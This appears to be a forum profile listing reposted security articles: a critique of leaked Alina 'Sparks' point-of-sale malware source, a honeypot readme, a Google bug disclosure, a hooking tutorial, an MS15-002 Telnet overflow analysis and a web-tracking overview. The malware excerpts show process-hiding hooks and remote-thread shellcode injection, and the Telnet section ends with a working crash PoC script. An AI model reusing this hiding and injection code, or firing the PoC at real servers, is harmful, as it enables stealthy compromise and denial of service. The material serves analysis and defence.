Everything posted by Nytro

  1. I recently got my hands on the source code of Alina "Sparks". The main 'improvement' everyone is talking about, the one making the price of this malware rise, is the rootkit feature. Josh Grunzweig already did an interesting write-up on a sample, but what is this new version actually worth? InjectedDLL.c from the source is a Chinese copy-paste of a ring3 NtQueryDirectoryFile hook, and it is commented out, replaced with two kernel32 hooks instead, like if the author cannot into hooks. A comment is still in Chinese, as you can see on the screenshot. Plus this:
[FONT=monospace]
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
{
    LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
    if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)
    {
        Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);
    }
    return Result;
}
...
// Registry Value Hiding
Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext);
Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);
[/FONT]
So many stupid mistakes in the code: no sanity checks in the hooks, nothing stable. I haven't looked at a sample in the wild, but I doubt it works at all. The actual rootkit source (the driver body is stored as a hex array in RootkitDriver.inc; PDB path c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap. This x86-32 driver is responsible for SSDT hooking of NtQuerySystemInformation, NtEnumerateValueKey and NtQueryDirectoryFile.
The driver is ridiculously simple:
[FONT=monospace]
NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc;
    BuildMdlForSSDT();
    InitStrings();
    SetHooks();
    return STATUS_SUCCESS;
}
[/FONT]
[FONT=monospace]
BOOL SetHooks()
{
    if ( !NtQuerySystemInformationOrig )
        NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);
    if ( !NtEnumerateValueKeyOrig )
        NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);
    if ( !NtQueryDirectoryFileOrig )
        NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);
    return TRUE;
}
[/FONT]
All of them hide the 'windefender' target process, file and registry entry:
[FONT=monospace]
void InitStrings()
{
    RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe");
    RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe");
    RtlInitUnicodeString(&WindefenderRegistryString, L"windefender");
}
[/FONT]
That is the malware's name; Josh also pointed in this direction in his analysis. First submitted to VT on 2013-10-17 17:27:10 UTC (1 year, 2 months ago): https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/ Overall that DLL seems unused; the Alina project uses the driver I mentioned. As for the project itself, it's still an awful piece of student lab work. Here is some of the log just from an attempt to compile it: source\grab\base.cpp(78): if SHGetSpecialFolderPath returns FALSE, the strcat to SourceFilePath is performed anyway. Two copy-pasted methods with the same mistake, source\grab\base.cpp(298) and source\grab\base.cpp(433): leaking the process information handle pi.hProcess.
Using hKey from a failed function call:
[FONT=monospace]
source\grab\base.cpp(316):
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
{
    RegCloseKey(hKey);
[/FONT]
pThread could be NULL; this is checked before WriteProcessMemory but not before CreateRemoteThread:
[FONT=monospace]
source\grab\monitoringthread.cpp(110):
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pThread != NULL)
    WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten);
HANDLE ThreadHandle = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);
[/FONT]
With hwid declared as char hwid[8], reading invalid data from hdr->hwid: the readable size is 8 bytes, but 18 bytes may be read: source\grab\panelrequest.cpp(73): memcpy(outkey, hdr->hwid, 18); realloc might return a null pointer: assigning it to buf, which was passed as the argument to realloc, will leak the original memory block: source\grab\panelrequest.cpp(173). The prior call to strncpy might not zero-terminate the string Result: source\grab\scanner.cpp(159). The return value of ReadFile is ignored; if it fails anywhere, the code is corrupted because the cmd variable is not initialized: source\grab\watcher.cpp(61), source\grab\watcher.cpp(64), source\grab\watcher.cpp(71). Signed/unsigned mismatch: source\grab\rootkitinstaller.cpp(47). Unreferenced local variable hResult: source\grab\base.cpp(158). Using TerminateThread does not allow proper thread clean-up: source\grab\watcher.cpp(125). Now, as for the 'editions': Sparks has some, for example the pipes, mutexes, user-agents and the process blacklist, but most of these edits are minor things that anybody could do to 'customise' their own bot; hardly anything that counts as a code addition or something 'new'. As for the panel... well, it's like the bot: nothing changed at all.
It's still the same ugly design, still the same files with the same modification timestamps, no code additions, still the same cookie-auth crap, as if the coder can't use sessions in PHP, and so on... To conclude, the main improvement is a copy-pasted rootkit that doesn't work. I don't know how many bad guys bought this source for $1k or more, but it's definitely not worth it. Overall it's a good example of how people can take some code, announce a rootkit to impress, and trade entirely on malware notoriety. This reminds me of the guys who announced IceIX on malware forums, when the samples finally turned out to be just a basic ZeuS with broken improvements. Hi Benson. Posted by Steven K at 00:07 Sursa: http://www.xylibox.com/2015/01/alina-sparks-source-code-review.html
  2. Nytro

    mailoney

    [h=1]About[/h] Mailoney is an SMTP honeypot I wrote just to have fun learning Python. The Open Relay module emulates an open relay and writes attempted emails to a log file. Similarly, the Authentication module captures credentials and writes those to a log file.
    [h=1]Usage[/h] You'll likely need to run this with elevated permissions, as required to open sockets on privileged ports.
    python mailoney.py -s mailbox <options>
    -h, --help Show this help message and exit
    -i <ip address> The IP address to listen on (defaults to localhost)
    -p <port> The port to listen on (defaults to 25)
    -s mailserver This will generate a fake hostname
    -t <type> Honeypot type:
      open_relay Emulates an open relay
      postfix_creds Emulates a Postfix authentication server, collects credentials
    Example: python mailoney.py -s mailbox -i 10.10.10.1 -p 990 -t postfix_creds
    [h=1]ToDo[/h] Add modules for Exim, Microsoft, others. Build in error handling. Add a daemon flag to background the process. Sursa: https://github.com/awhitehatter/mailoney
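An open-relay SMTP honeypot like the one described boils down to a small SMTP state machine that accepts everything and logs it. The sketch below is not mailoney's actual code; it is a hypothetical, simplified model of the idea, with the socket I/O stripped out so the logic is visible:

```python
# Hypothetical sketch of an open-relay SMTP honeypot's core logic
# (not mailoney's code): accept every sender/recipient, log every line.
def smtp_response(line, state):
    """Return (reply, new_state) for one client line; state is 'cmd' or 'data'."""
    if state == "data":
        if line == ".":                       # end of the DATA section
            return "250 OK: queued", "cmd"
        return None, "data"                   # message body: logged, no reply
    verb = line.split(" ", 1)[0].upper()
    if verb in ("HELO", "EHLO"):
        return "250 mailbox Hello", "cmd"
    if verb in ("MAIL", "RCPT"):
        return "250 OK", "cmd"                # accept anything: an "open relay"
    if verb == "DATA":
        return "354 End data with <CR><LF>.<CR><LF>", "data"
    if verb == "QUIT":
        return "221 Bye", "cmd"
    return "502 Command not implemented", "cmd"

def handle_session(lines, log):
    """Drive the state machine over the client's lines, logging each one."""
    state, replies = "cmd", []
    for line in lines:
        log.append(line)                      # the honeypot's whole point
        reply, state = smtp_response(line, state)
        if reply is not None:
            replies.append(reply)
    return replies
```

In the real tool these lines would come off a socket accepted on port 25 and `log` would be flushed to a file; the reply strings here are simplified placeholders.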
  3. Windows: Impersonation Check Bypass With CryptProtectMemory and CRYPTPROTECTMEMORY_SAME_LOGON flag Reported by fors.. @google.com, Oct 17, 2014 Platform: Windows 7, 8.1 Update 32/64 bit Class: Security Bypass/Information Disclosure The function CryptProtectMemory allows an application to encrypt memory for one of three scenarios: process, logon session, and computer. When using the logon session option (the CRYPTPROTECTMEMORY_SAME_LOGON flag), the encryption key is generated based on the logon session identifier; this is for sharing memory between processes running within the same logon. As this might also be used for sending data from one process to another, it supports extracting the logon session id from the impersonation token. The issue is that the implementation in CNG.sys doesn't check the impersonation level of the token when capturing the logon session id (using SeQueryAuthenticationIdToken), so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session. This might be an issue if there's a service which is vulnerable to a named pipe planting attack or is storing encrypted data in a world-readable shared memory section. This behaviour might of course be by design; however, not having been party to the design, it's hard to tell. The documentation states that the user must impersonate the client, which I read to mean it should be able to act on behalf of the client rather than merely identify as the client. Attached is a simple PoC which demonstrates the issue. To reproduce, follow these steps: 1) Execute Poc_CNGLogonSessionImpersonation.exe from the command line 2) The program should print "Encryption doesn't match" to indicate that the two encryptions of the same data did not match, implying the key was different between them.
Expected Result: Both calls should return the same encrypted data, or the second call should fail. Observed Result: Both calls succeed and return different encrypted data. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Attachment: Poc_CNGLogonSessionImpersonation.zip (62.4 KB) Sursa: https://code.google.com/p/google-security-research/issues/detail?id=128
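To make the bug class concrete, here is a toy model in Python (nothing to do with the real CNG.sys internals; all names and the key derivation are invented). Encryption is keyed purely by the logon session id taken from whatever token the caller presents, and the fix corresponds exactly to the impersonation-level check the report says is missing:

```python
from collections import namedtuple
from hashlib import sha256

# Toy token: a real Windows token carries both a logon session id and the
# impersonation level the client granted (Identification < Impersonation).
Token = namedtuple("Token", "logon_session_id impersonation_level")
IDENTIFICATION, IMPERSONATION = 1, 2

def session_key(token, check_level):
    """Derive a per-logon-session key; the vulnerable path skips the check."""
    if check_level and token.impersonation_level < IMPERSONATION:
        raise PermissionError("token only allows identification")
    return sha256(b"logon-key:%d" % token.logon_session_id).digest()

# A token obtained at Identification level (e.g. via a planted named pipe).
victim = Token(logon_session_id=0x3E7, impersonation_level=IDENTIFICATION)

# Vulnerable behaviour: the weak token still yields the victim session's key,
# so the attacker can encrypt/decrypt data "for that logon session".
weak_key = session_key(victim, check_level=False)

# Patched behaviour: the same token is rejected.
try:
    session_key(victim, check_level=True)
    print("BUG: weak token accepted")
except PermissionError:
    print("weak token rejected")
```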
  4. [h=1]CodeInspect says “Hello World”: A new Reverse-Engineering Tool for Android and Java Bytecode[/h] Posted on 2014/12/26 by Siegfried Rasthofer We are very happy to announce a new tool in our toolchain: CodeInspect - a Jimple-based reverse-engineering framework for Android and Java applications. Developing an Android application in an IDE is very convenient, since features like code completion, “Open Declaration”, renaming variables, searching files etc. help the developer a lot. Code debugging in particular is a very important IDE feature. Usually, all those features are available for the source code, not for the bytecode, since they support the developer, not a reverse engineer. But all those features would also be very helpful for reverse-engineering Android or Java applications. This is the reason why we came up with a new reverse-engineering framework that works on the intermediate representation Jimple and supports all the features above and a lot more. In the following we give a detailed description of CodeInspect and its features. As input, CodeInspect accepts a complete Android application package (apk), just the Android bytecode (dex file) or a jar file. In the following we describe the different features based on a malicious Android apk. [h=1]Framework Overview[/h] The figure above is a screenshot of CodeInspect. As one can see, CodeInspect is based on the Eclipse RCP framework. One can define a workspace with different projects (apks). Furthermore, CodeInspect contains different perspectives, different views and a new editor for the intermediate representation. The main perspectives are the “CodeInspect” perspective as shown in the screenshot and the “Debug” perspective known from the general Eclipse IDE, including views for “Expressions”, “Breakpoints” and “Variables”.
Other basic views in the CodeInspect perspective are:
Project Explorer: shows all the important files of an apk in a readable format.
Outline: shows all the fields and methods of a specific class. By clicking on an item, one jumps directly to the corresponding line in the code.
Console: shows the console output.
Problems: shows all the warnings and errors (e.g., compilation errors) that occur in the project.
Sursa: CodeInspect says “Hello World”: A new Reverse-Engineering Tool for Android and Java Bytecode | Secure Software Engineering
  5. Virtual Method Table (VMT) Hooking Posted on January 15, 2015 by admin This post will cover the topic of hooking a class's virtual method table. This is a useful technique that has many applications, but is most commonly seen in the development of game hacks. For example, employing VMT hooking of objects in a Direct3D/OpenGL graphics engine is how in-game overlays are displayed. Virtual Method Tables (or vtables) Usage of VMTs, in the context of C++ for this post, is how polymorphism is implemented at the language level. Internally, the VMT is represented as an array of function pointers, and typically resides at the beginning or end of the memory layout of the object. Whenever a C++ class declares a virtual function, the compiler will add an entry into the VMT for it. If a class inherits from a base object and overrides a base virtual function, then the pointer to the overridden function will be present in the derived object's VMT. For example, take the following code, compiled with the VS 2013 compiler on an x86 system:
[TABLE] [TR] [TD=class: code]class Base {
public:
    Base() { printf("- Base::Base\n"); }
    virtual ~Base() { printf("- Base::~Base\n"); }
    void A() { printf("- Base::A\n"); }
    virtual void B() { printf("- Base::B\n"); }
    virtual void C() { printf("- Base::C\n"); }
};

class Derived final : public Base {
public:
    Derived() { printf("- Derived::Derived\n"); }
    ~Derived() { printf("- Derived::~Derived\n"); }
    void B() override { printf("- Derived::B\n"); }
    void C() override { printf("- Derived::C\n"); }
};[/TD] [/TR] [/TABLE]
with the instances of Base and Derived created as follows:
[TABLE] [TR] [TD=class: code]Base base;
Derived derived;
Base *pBase = new Derived;[/TD] [/TR] [/TABLE]
The class Base has three virtual functions: ~Base, B, and C. The class Derived, which inherits from Base, overrides the two virtual functions B and C.
In memory, the VMT for Base will contain ~Base, B, and C, as can be inspected with the debugger, while the VMT for the two Derived instances contains ~Derived, B, and C, but with different addresses for each than the ones in Base (see below). So how are these actually used? Take, for example, a function that takes a pointer to a Base instance and invokes the functions A, B, and C on it:
[TABLE] [TR] [TD=class: code]void Invoke(Base * const pBase) {
    pBase->A();
    pBase->B();
    pBase->C();
}[/TD] [/TR] [/TABLE]
and is invoked in the following manner:
[TABLE] [TR] [TD=class: code]Invoke(&base);
Invoke(&derived);
Invoke(pBase);[/TD] [/TR] [/TABLE]
The Invoke function disassembled for x86 is as follows:
    pBase->A();
004012C9 8B 4D 08        mov ecx,dword ptr [pBase]
004012CC E8 8F FE FF FF  call Base::A (0401160h)
    pBase->B();
004012D1 8B 45 08        mov eax,dword ptr [pBase]
004012D4 8B 10           mov edx,dword ptr [eax]
004012D6 8B 4D 08        mov ecx,dword ptr [pBase]
004012D9 8B 42 04        mov eax,dword ptr [edx+4]
004012DC FF D0           call eax
    pBase->C();
004012DE 8B 45 08        mov eax,dword ptr [pBase]
004012E1 8B 10           mov edx,dword ptr [eax]
004012E3 8B 4D 08        mov ecx,dword ptr [pBase]
004012E6 8B 42 08        mov eax,dword ptr [edx+8]
004012E9 FF D0           call eax
This disassembly shows exactly what is going on under the hood with relation to polymorphism. For the invocations of B and C, the compiler moves the address of the object into the EAX register. This is then dereferenced to get the base of the VMT, which is stored in the EDX register. The appropriate VMT entry for the function is found by indexing off EDX, and the resulting address is stored in EAX. This function is then called. Since Base and Derived have different VMTs, this code will call different functions — the appropriate ones — for the appropriate object type. Seeing how it's done under the hood also allows us to easily write a function to print the VMT.
[TABLE] [TR] [TD=class: code]void PrintVTable(Base * const pBase) {
    unsigned int *pVTableBase = (unsigned int *)(*(unsigned int *)pBase);
    printf("First: %p\n"
           "Second: %p\n"
           "Third: %p\n",
           *pVTableBase, *(pVTableBase + 1), *(pVTableBase + 2));
}[/TD] [/TR] [/TABLE]
Hooking the VMT Knowing the layout of the VMT makes it trivial to hook. To accomplish this, all that is needed is to overwrite the entry in the VMT with the address of the desired hook function. This is done by using the VirtualProtect function to set the appropriate memory permissions, along with memcpy to write in the desired hook address. Note that memcpy is used since everything resides within the same address space; otherwise WriteProcessMemory would have to be used. A hooking routine might look like the following:
[TABLE] [TR] [TD=class: code]void HookVMT(Base * const pBase) {
    unsigned int *pVTableBase = (unsigned int *)(*(unsigned int *)pBase);
    unsigned int *pVTableFnc = (unsigned int *)(pVTableBase + 1);
    void *pHookFnc = (void *)VMTHookFnc;
    DWORD ulOldProtect = 0;
    (void)VirtualProtect(pVTableFnc, sizeof(void *), PAGE_EXECUTE_READWRITE, &ulOldProtect);
    memcpy(pVTableFnc, &pHookFnc, sizeof(void *));
    (void)VirtualProtect(pVTableFnc, sizeof(void *), ulOldProtect, &ulOldProtect);
}[/TD] [/TR] [/TABLE]
and VMTHookFnc having a simple definition of
[TABLE] [TR] [TD=class: code]void __fastcall VMTHookFnc(void *pEcx, void *pEdx) {
    Base *pThisPtr = (Base *)pEcx;
    printf("In VMTHookFnc\n");
}[/TD] [/TR] [/TABLE]
Here the fastcall calling convention is used to easily retrieve the this pointer, which is typically stored in the ECX register. Applications The application of this technique will show how to hook IDXGISwapChain::Present and allow for rendering/overlaying of text on a Direct3D10 application. This is not the only way to overlay text, nor necessarily the best, but it still provides an adequate example to illustrate the point.
The target application will be a Direct3D10 sample provided by the June 2010 DirectX SDK. See /Samples/C++/Direct3D10/Tutorials/Tutorial01 in the SDK. The sample application initializes the Direct3D device and swap chain with a call to D3D10CreateDeviceAndSwapChain, then simply sets up a view and renders a blue background on the window (screenshot below). To overlay text on a Direct3D application, the IDXGISwapChain object must be obtained. Then the Present function of the interface must be hooked, since that is the function responsible for showing the rendered image to the user. This is done here by hooking D3D10CreateDeviceAndSwapChain. Once this function is hooked, the hook will call the real D3D10CreateDeviceAndSwapChain function in order to set up the IDXGISwapChain interface. Then the VMT entry for Present will be replaced with a hooked version that renders text. Put into code it looks like the following:
[TABLE] [TR] [TD=class: code]HRESULT WINAPI D3D10CreateDeviceAndSwapChainHook(IDXGIAdapter *pAdapter, D3D10_DRIVER_TYPE DriverType, HMODULE Software, UINT Flags, UINT SDKVersion, DXGI_SWAP_CHAIN_DESC *pSwapChainDesc, IDXGISwapChain **ppSwapChain, ID3D10Device **ppDevice)
{
    printf("In D3D10CreateDeviceAndSwapChainHook\n");

    //Create the device and swap chain
    HRESULT hResult = pD3D10CreateDeviceAndSwapChain(pAdapter, DriverType, Software, Flags, SDKVersion, pSwapChainDesc, ppSwapChain, ppDevice);

    //Save the device and swap chain interface.
    //These aren't used in this example but are generally nice to have addresses to
    if(ppSwapChain == NULL)
    {
        printf("Swap chain is NULL.\n");
        return hResult;
    }
    else
    {
        pSwapChain = *ppSwapChain;
    }
    if(ppDevice == NULL)
    {
        printf("Device is NULL.\n");
        return hResult;
    }
    else
    {
        pDevice = *ppDevice;
    }

    //Get the vtable address of the swap chain's Present function and modify it with our own.
    //Save it to return to later in our Present hook
    if(pSwapChain != NULL)
    {
        DWORD_PTR *SwapChainVTable = (DWORD_PTR *)pSwapChain;
        SwapChainVTable = (DWORD_PTR *)SwapChainVTable[0];
        printf("Swap chain VTable: %X\n", SwapChainVTable);
        PresentAddress = (pPresent)SwapChainVTable[8];
        printf("Present address: %X\n", PresentAddress);
        DWORD OldProtections = 0;
        VirtualProtect(&SwapChainVTable[8], sizeof(DWORD_PTR), PAGE_EXECUTE_READWRITE, &OldProtections);
        SwapChainVTable[8] = (DWORD_PTR)PresentHook;
        VirtualProtect(&SwapChainVTable[8], sizeof(DWORD_PTR), OldProtections, &OldProtections);
    }

    //Create the font that we will be drawing with
    CreateDrawingFont();
    return hResult;
}[/TD] [/TR] [/TABLE]
CreateDrawingFont simply sets up an ID3DX10Font to draw with. Now, since the VMT entry was replaced, PresentHook will be invoked instead of Present. Here is where the drawing can be done.
[TABLE] [TR] [TD=class: code]HRESULT WINAPI PresentHook(IDXGISwapChain *thisAddr, UINT SyncInterval, UINT Flags)
{
    //printf("In Present (%X)\n", PresentAddress);
    RECT Rect = { 100, 100, 200, 200 };
    pFont->DrawTextW(NULL, L"Hello, World!", -1, &Rect, DT_CENTER | DT_NOCLIP, RED);
    return PresentAddress(thisAddr, SyncInterval, Flags);
}[/TD] [/TR] [/TABLE]
I chose a different calling convention here than for the earlier example code, but everything still functions the same. The end result shows the Present hook successfully rendering the text: A few important caveats about doing it this way: the hook must be installed prior to the call to D3D10CreateDeviceAndSwapChain, otherwise handles to the device and swap chain won't be obtained. ID3DX10Font::DrawText can mess with the blend states, shaders, rasterizer, etc.; overlaying text on an application that makes use of these requires the hook developer to account for this and save/restore the states properly. The source code for the VMT hook example, the slightly modified Direct3D10 sample application, and the Direct3D10 hook can be found here.
The hook uses Microsoft Detours as a dependency to perform the initial hooking of D3D10CreateDeviceAndSwapChain. Sursa: http://www.codereversing.com/blog/?p=181
  6. 2015/01/16 9:09 | cssembly | binary security, vulnerability analysis
0x00 Vulnerability analysis
MS15-002 is a buffer overflow vulnerability in the Microsoft Telnet service; below, its root cause is analyzed and a POC is constructed. The Telnet service runs as tlntsvr.exe, and for each client connection it starts a corresponding tlntsess.exe process. By diffing the patched tlntsess.exe against the unpatched one, the vulnerability can be located in the following function:
[TABLE] [TR] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD] [/TR] [/TABLE]
Before the patch, the function uses a single buffer; after the patch, it uses two. In the patched version, after calling
[TABLE] [TR] [TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2, &v13, &v9, v6)[/TD] [/TR] [/TABLE]
the code first checks the length of the data in the temporary buffer:
[TABLE] [TR] [TD=class: code](unsigned int)(v9 - (unsigned __int8 *)&Src - 1) <= 0x7FE[/TD] [/TR] [/TABLE]
It then checks whether the destination buffer can hold that many bytes; if
[TABLE] [TR] [TD=class: code](unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800[/TD] [/TR] [/TABLE]
it exits, otherwise
[TABLE] [TR] [TD=class: code]memcpy_s(v14, (char *)&v18 - (_BYTE *)v14, &Src, v9 - (unsigned __int8 *)&Src)[/TD] [/TR] [/TABLE]
copies the data into the Dst buffer.
Before the patch there is only one buffer, and the length check happens before the handler call: the call
[TABLE] [TR] [TD=class: code](*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)[/TD] [/TR] [/TABLE]
is made only when v13 - &Src <= 2048, where v13 points to the free space at the head of the buffer. However, the called handler can itself modify the value of v13. For instance,
[TABLE] [TR] [TD=class: code]void __thiscall CRFCProtocol::DoTxBinary(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD] [/TR] [/TABLE]
changes the value of its third parameter, i.e. *a3 += 3. From the analysis it follows that if v13 - &Src == 2047, the v13 - &Src <= 2048 condition is still satisfied; if the dispatched (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6) call then lands in CRFCProtocol::DoTxBinary, the following instruction sequence executes, plainly overflowing the buffer:
[TABLE] [TR] [TD=class: code]v7 = *a3;
*v7 = -1;
v7[1] = -3;
v7[2] = a4;
v7[3] = 0;
*a3 += 3;[/TD] [/TR] [/TABLE]
The patched version uses two buffers and passes the temporary buffer pointer as v9:
[TABLE] [TR] [TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2, &v13, &v9, v6)[/TD] [/TR] [/TABLE]
After the function returns, it determines the length of the data in the buffer pointed to by v9, and finally checks whether the destination buffer has enough space available for the remaining data, namely the (unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800 check.
0x01 Environment setup and POC construction
On Windows 7, install and start the Telnet server. Run net user exp 123456 /ADD to create the user exp, then net localgroup TelnetClients exp /ADD to add it to the TelnetClients group, so that it can log in through a telnet client. Debugging shows that in
[TABLE] [TR] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD] [/TR] [/TABLE]
a2 is the length of the received data, at most 0x400, and v6 points to the received data. To trigger the overflow, the (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6) call must therefore expand the data, so that after processing, more than 0x800 bytes land in the Src buffer. Looking at the handlers reachable through (*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6),
[TABLE] [TR] [TD=class: code]void __thiscall CRFCProtocol::AreYouThere(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD] [/TR] [/TABLE]
obviously expands the data: a4 is one byte of the received input, and each invocation writes 9 bytes of fixed data into the buffer pointed to by a3. After capturing a session with Wireshark for a quick protocol analysis, the POC can be constructed as follows: make the program call CRFCProtocol::AreYouThere repeatedly, eventually triggering an exception.
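The overflow arithmetic can be sanity-checked quickly; the 0x400 receive cap, the 0x800 destination buffer and the 9-byte AreYouThere output all come from the analysis above:

```python
# Each "\xff\xf6" pair (telnet IAC + AYT) makes the handler emit a fixed
# 9-byte reply into the stack buffer, so one maximum-size receive expands
# well past the destination buffer.
RECV_MAX = 0x400      # a2 caps at 0x400 per the debugger
DST_SIZE = 0x800      # size of the stack buffer being overflowed
AYT_CMD_LEN = 2       # IAC (0xff) + AYT (0xf6)
REPLY_LEN = 9         # bytes AreYouThere writes per command

commands = RECV_MAX // AYT_CMD_LEN   # 0x200 AYT commands fit in one receive
expanded = commands * REPLY_LEN      # bytes written by the handler
print(hex(expanded), expanded > DST_SIZE)
```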
[TABLE] [TR] [TD=class: code]import socket

address = ('192.168.172.152', 23)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(address)
data = "\xff\xf6" * 0x200
s.send(data)
s.recv(512)
s.close()[/TD] [/TR] [/TABLE]
Run the POC with a breakpoint set on
[TABLE] [TR] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD] [/TR] [/TABLE]
When it breaks, you can see a2 = 0x400, and (DWORD)((DWORD *)(this + 0x1E40) + 0x16c8) points to the received data. Set a breakpoint before the function returns; after it executes, you can see that __security_check_cookie detects the stack overflow and triggers an exception, breaking into the debugger. Disclaimer: unauthorized reproduction prohibited. cssembly @ wooyun Knowledge Base. Sursa: https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F4621&edit-text=
  7. Technical analysis of client identification mechanisms Written by Artur Janc <aaj@google.com> and Michal Zalewski <lcamtuf@google.com> In common use, the term “web tracking” refers to the process of calculating or assigning unique and reasonably stable identifiers to each browser that visits a website. In most cases, this is done for the purpose of correlating future visits from the same person or machine with historical data. Some uses of such tracking techniques are well established and commonplace. For example, they are frequently employed to tell real users from malicious bots, to make it harder for attackers to gain access to compromised accounts, or to store user preferences on a website. In the same vein, the online advertising industry has used cookies as the primary client identification technology since the mid-1990s. Other practices may be less known, may not necessarily map to existing browser controls, and may be impossible or difficult to detect. Many of them - in particular, various methods of client fingerprinting - have garnered concerns from software vendors, standards bodies, and the media. To guide us in improving the range of existing browser controls and to highlight the potential pitfalls when designing new web APIs, we decided to prepare a technical overview of known tracking and fingerprinting vectors available in the browser. Note that we describe these vectors, but do not wish this document to be interpreted as a broad invitation to their use. Website owners should keep in mind that any single tracking technique may be conceivably seen as inappropriate, depending on user expectations and other complex factors beyond the scope of this doc. 
We divided the methods discussed on this page into several categories: explicitly assigned client-side identifiers, such as HTTP cookies; inherent client device characteristics that identify a particular machine; and measurable user behaviors and preferences that may reveal the identity of the person behind the keyboard (or touchscreen). After reviewing the known tracking and fingerprinting techniques, we also discuss potential directions for future work and summarize some of the challenges that browser and other software vendors would face trying to detect or prevent such behaviors on the Web.
Contents
1 Explicitly assigned client-side identifiers
  1.1 HTTP cookies
  1.2 Flash LSOs
  1.3 Silverlight Isolated Storage
  1.4 HTML5 client-side storage mechanisms
  1.5 Cached objects
  1.6 Cache metadata: ETag and Last-Modified
  1.7 HTML5 AppCache
  1.8 Flash resource cache
  1.9 SDCH dictionaries
  1.10 Other script-accessible storage mechanisms
  1.11 Lower-level protocol identifiers
2 Machine-specific characteristics
  2.1 Browser-level fingerprints
  2.2 Network configuration fingerprints
3 User-dependent behaviors and preferences
4 Fingerprinting prevention and detection challenges
5 Potential directions for future work
Explicitly assigned client-side identifiers
The canonical approach to identifying clients across HTTP requests is to store a unique, long-lived token on the client and to programmatically retrieve it on subsequent visits.
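As a minimal illustration of this canonical approach (a sketch, not code from the document; the key and token format are invented), a site can mint a random identifier on a first visit and recognize it on later ones, signing the value so tampered or forged cookies are rejected:

```python
import hashlib
import hmac
import secrets

SERVER_KEY = b"hypothetical-server-secret"   # made-up key for this sketch

def mint_token():
    """Issue a new client identifier, e.g. sent in a Set-Cookie header."""
    client_id = secrets.token_hex(16)
    sig = hmac.new(SERVER_KEY, client_id.encode(), hashlib.sha256).hexdigest()
    return f"{client_id}.{sig}"

def verify_token(token):
    """Return the client id if the signature checks out, else None."""
    client_id, _, sig = token.rpartition(".")
    want = hmac.new(SERVER_KEY, client_id.encode(), hashlib.sha256).hexdigest()
    return client_id if client_id and hmac.compare_digest(sig, want) else None

token = mint_token()                      # first visit: set the cookie
assert verify_token(token) is not None    # later visit: replayed cookie
assert verify_token(token + "0") is None  # tampered cookie rejected
```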
Modern browsers offer a multitude of ways to achieve this goal, including but not limited to:
  • Plain old HTTP cookies,
  • Cookie-equivalent plugin features - most notably, Flash Local Shared Objects and Silverlight Isolated Storage,
  • HTML5 client storage mechanisms, including localStorage, File, and IndexedDB APIs,
  • Unique markers stored within locally cached resources or in cache metadata - e.g., Last-Modified and ETag,
  • Fingerprints derived from browser-generated Origin-Bound Certificates for SSL connections,
  • Bits encoded in HTTP Strict Transport Security pin lists across several attacker-controlled host names,
  • Data encoded in SDCH compression dictionaries and dictionary metadata,
  • ...and more.
